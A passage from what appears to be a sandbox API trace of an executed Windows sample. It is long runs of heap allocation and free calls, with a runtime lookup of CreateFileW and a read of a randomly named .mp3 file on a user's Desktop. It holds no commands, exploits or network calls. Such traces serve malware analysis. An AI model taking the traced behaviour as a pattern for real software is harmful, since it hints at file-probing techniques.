hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0125.386] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0125.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0125.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0125.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0125.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.389] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0125.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0125.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0125.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.392] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0125.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0125.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0125.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.393] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0125.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0125.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0125.394] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\oIFaH-1_nryv.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\oifah-1_nryv.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0125.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.396] HeapFree (in: 